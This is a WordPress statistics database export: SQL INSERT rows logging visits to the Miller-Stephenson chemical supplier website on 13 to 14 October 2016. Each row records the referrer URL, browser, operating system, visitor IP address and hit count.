INSERT INTO `wp_statistics_visitor` VALUES (3891, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '70.195.202.126', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3892, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.101', '', '192.109.145.48', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3893, '2016-10-13', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1208.Mg2e3S3llr2llkGKDp9w5fIJicmlEAhWxRSUFz3NiEIvutDPVoIgP7cc7TfnzvWc.83d12198ceda03895d882ff83b1e36e17a94344b&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhUZEJ4Vl9jRFgtVEcyTWJEV0x5dDlERV9WMjc5SnFSRFNib1NKYkY5dTc0Ny1ra3RDSEs0bW9iY0dlRngyXzExUQ&b64e=2&sign=8a322c562ce98d97f41578d0616370b6&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4ArNqjGKCjIQwLl_125f0jJeSodopDfdgjyPIpp45czK_JFp592MhhJKRTgpPw7-o4T2MxhBGlyIA_Sf2PLCLNVdBmYw_KYtnbp5YsGfitqLavdnQ5oWiS0f0U8-Xs3bM&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCV-bB70LKhDfN55SzlVIr2xyF5MjNc8nEcNMARbvKC4-39vvww9hEwZsgRjroay8X9tePMvXZAZS2t1cZjTjPkikBiWhpj8y5U&l10n=ru&cts=1476391822233&mc=6.48771407074', 'Chrome', 'Windows', '31.0.1650.63', '', '95.27.31.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3894, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '88.198.22.8', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3895, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '71.1.180.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3896, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.60.81.122', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3897, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '174.63.188.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3898, '2016-10-13', 'https://www.google.com/', 'Safari', 'iPad', '8.0', '', '50.201.115.146', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3899, '2016-10-13', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '70.209.139.0', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3900, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '165.156.25.4', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3901, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=3&cad=rja&uact=8&ved=0ahUKEwjY9tS33tjPAhUFFz4KHRM8CroQFggpMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.cWw', 'MSIE', 'Windows', '10.0', '', '199.89.130.52', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3902, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '71.129.50.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3903, '2016-10-13', 'https://www.miller-stephenson.com/miller/careers.html', 'MSIE', 'Windows', '9.0', '', '182.118.25.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3904, '2016-10-13', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '75.133.123.43', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3905, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.233.213.10', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3906, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.165.161.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3907, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '71.95.218.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3908, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '7.0', '', '37.208.66.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3909, '2016-10-13', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '206.219.248.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3910, '2016-10-13', 'https://www.google.co.ve/', 'Chrome', 'Windows', '53.0.2785.143', '', '190.153.37.140', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3911, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '46.28.105.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3912, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '88.198.22.8', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3913, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '68.52.4.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3914, '2016-10-13', 'https://expresstoplivo.ru/', 'Unknown', 'Unknown', 'Unknown', '', '37.115.187.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3915, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '68.142.232.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3916, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '74.208.180.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3917, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3918, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.99', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3919, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '172.58.97.179', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3920, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '216.51.232.61', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3921, '2016-10-13', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '68.187.66.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3922, '2016-10-13', 'https://www.miller-stephenson.com', 'Safari', 'Unknown', '602.1', '', '68.187.66.77', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3923, '2016-10-13', 'https://www.google.com/', 'Firefox', 'Linux', '49.0', '', '73.226.60.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3924, '2016-10-13', 'https://www.google.ca/', 'Safari', 'iPhone', '7.0', '', '173.34.228.132', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3925, '2016-10-13', 'https://www.google.ca/', 'Safari', 'iPad', '600.1.4', '', '99.240.242.157', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3926, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwirkubN89jPAhVFQpoKHUcECw8QFgg7MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fepoxy-resin-systems%2Fepikure-curing-agents%2Fepikure-200-series-aliphatic-amines%2F%3Forderby%3Dprice&usg=AFQjCNERoxzqqyDnFvWHYwQ_pHqj3iIE3g', 'MSIE', 'Windows', '11.0', '', '66.195.233.66', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3927, '2016-10-13', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '50.113.92.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3928, '2016-10-13', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '24.193.212.151', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3929, '2016-10-13', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '91.126.61.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3930, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.116', '', '76.69.129.24', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3931, '2016-10-13', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '65.55.213.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3932, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '203.75.213.67', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3933, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '3.6.8', '', '107.20.220.83', '000', 63, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3934, '2016-10-14', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-fpg-grease/', 'Chrome', 'Macintosh', '53.0.2785.116', '', '76.69.129.24', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3935, '2016-10-14', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '107.3.95.149', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3936, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3937, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3938, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3939, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3940, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '78.46.21.97', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3941, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '14.36.156.26', '000', 103, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3942, '2016-10-14', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjZ4vW7hNnPAhUFg34KHYw_AMwYABAB&sig=AOD64_1ZoF8uisSmz6iC0uPn8f1evGahlQ&rct=j&frm=1&q=&ved=0ahUKEwiluvO7hNnPAhWni1QKHTI1CPkQ0QwIRQ&adurl=', 'MSIE', 'Windows', '10.0', '', '206.170.230.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3943, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '34.0.1847.76', '', '166.137.139.21', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3944, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3945, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3946, '2016-10-14', 'https://www.google.co.jp/', 'Chrome', 'Windows', '53.0.2785.143', '', '118.21.145.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3947, '2016-10-14', 'https://www.google.ca/', 'Chrome', 'iPhone', '53.0.2785.109', '', '207.228.78.208', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3948, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '73.77.123.101', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3949, '2016-10-14', 'https://mmk.mschem.com/miller/vazo_grades.html', 'MSIE', 'Windows', '11.0', '', '1.220.27.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3950, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3951, '2016-10-14', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'Edge', 'Windows', '14.14393', '', '24.193.212.151', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3952, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.221.140.244', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3953, '2016-10-14', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.143', '', '189.189.27.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3954, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '180.191.134.178', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3955, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3956, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3957, '2016-10-14', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjnj76MldnPAhVDKo8KHSJdBoYQFggpMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.c2I', 'MSIE', 'Windows', '11.0', '', '115.88.84.114', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3958, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.169.26.127', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3959, '2016-10-14', 'https://www.google.com.au/', 'Chrome', 'Windows', '53.0.2785.143', '', '139.130.134.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3960, '2016-10-14', 'https://viewer.zmags.com/services/htmlviewer/content/6c6119a2?pubVersion=3&locale=en_us&viewerID=6f6d9928&referrer=https%3A%2F%2Fea.ecn5.com%2FClicks%2FaFJSTFo4S2trYkFtRG5JKzRtM2JJaFJhaEVMaXRRNzFjc2FzSDlJa0JnTWI2NHRxRzF1Um5CZ3VRbDZtRTE5UjJ2QTI4MFNtdmU5czhKUjlNSHhGZVE9PQ%253d%253d', 'Safari', 'iPhone', '9.0', '', '75.114.14.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3961, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.0.2', '', '54.184.56.73', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3962, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '27.0.1453', '', '209.133.111.215', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3963, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '209.133.111.215', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3964, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '76.99.199.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3965, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '75.70.73.254', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3966, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '75.87.70.235', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3967, '2016-10-14', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '48.0.2564.97', '', '199.168.97.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3968, '2016-10-14', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Firefox', 'Windows', '44.0', '', '199.168.97.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3969, '2016-10-14', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Firefox', 'Windows', '43.0', '', '199.168.97.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3970, '2016-10-14', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3971, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '24.4.10.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3972, '2016-10-14', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.112.23', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3973, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3974, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3975, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3976, '2016-10-14', 'https://www.miller-stephenson.com/', 'Chrome', 'iPhone', '53.0.2785.109', '', '108.173.42.185', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3977, '2016-10-14', 'https://urlopener.blogspot.in/', 'Firefox', 'Windows', '35.0', '', '117.242.188.166', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3978, '2016-10-14', 'https://www.bing.com/search?q=miller+stephenson&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3979, '2016-10-14', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '9.0', '', '204.79.180.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3980, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '75.80.49.111', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3981, '2016-10-14', 'https://www.miller-stephenson.com', 'Mojolicious', 'Unknown', 'Unknown', '', '71.63.70.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3982, '2016-10-14', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '72.208.18.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3983, '2016-10-14', 'https://globalwits.globalsou.com/crawl/searchResult.asp?id=55922', 'Chrome', 'Windows', '45.0.2454.101', '', '27.223.28.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3984, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '137.110.34.253', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3985, '2016-10-14', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Linux', '534.34', '', '23.22.171.101', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3986, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '10.191.169.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3987, '2016-10-14', 'https://www.miller-stephenson.com/', 'Chrome', 'Android', '27.0.1453', '', '65.57.245.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3988, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.33.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3989, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '180.173.22.216', '000', 43, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3990, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.65.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3991, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3992, '2016-10-14', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '174.22.6.188', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3993, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3994, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '212.227.114.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3995, '2016-10-14', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '48.0.2564.116', '', '199.168.97.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3996, '2016-10-14', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '48.0.2564.103', '', '199.168.97.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3997, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '2.0.0.6', '', '185.106.122.175', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3998, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '76.115.186.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3999, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4000, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.156.243', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4001, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.6.77.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4002, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '195.154.146.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4003, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '98.138.81.167', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4004, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '70.198.194.118', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4005, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '74.208.16.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4006, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4007, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.152.129.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4008, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '89.46.7.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4009, '2016-10-14', 'https://www.google.co.kr/', 'Chrome', 'Windows', '53.0.2785.143', '', '106.245.75.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4010, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '17.0.963.66', '', '54.67.103.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4011, '2016-10-14', 'https://www.google.co.kr/', 'Chrome', 'Windows', '53.0.2785.143', '', '112.175.15.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4012, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4013, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.105', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4014, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.46', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4015, '2016-10-14', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '81.213.141.55', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4016, '2016-10-14', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '88.247.133.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4017, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '174.195.150.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4018, '2016-10-14', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '79.76.67.48', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4019, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4020, '2016-10-14', 'https://www.google.ca/', 'Safari', 'iPhone', '10.0', '', '65.94.53.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4021, '2016-10-14', 'https://www.bing.com/search?q=krytox+xht+lubricant&qs=n&form=QBRE&pq=krytox+xht+lubricant&sc=0-20&sp=-1&sk=&cvid=AF4940FC4EDA4F3EAE4559EA9F03311E', 'MSIE', 'Windows', '11.0', '', '31.221.32.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4022, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '104.34.127.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4023, '2016-10-14', 'https://www.miller-stephenson.com/about/', 'Edge', 'Windows', '14.14393', '', '67.189.220.246', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4024, '2016-10-14', 'https://www.google.com.tr/', 'Chrome', 'Windows', '49.0.2623.112', '', '85.96.101.175', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4025, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4026, '2016-10-14', 'https://www.google.com.tr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiDhaq45NnPAhXmKsAKHX1SD7AQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fplastic-glass-metal-cleaner%2F&usg=AFQjCNHPWy4BoHCEDieQeBhAcZ0emHXcqw', 'MSIE', 'Windows', '11.0', '', '78.182.137.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4027, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '95.6.72.70', '000', 4, 0); 
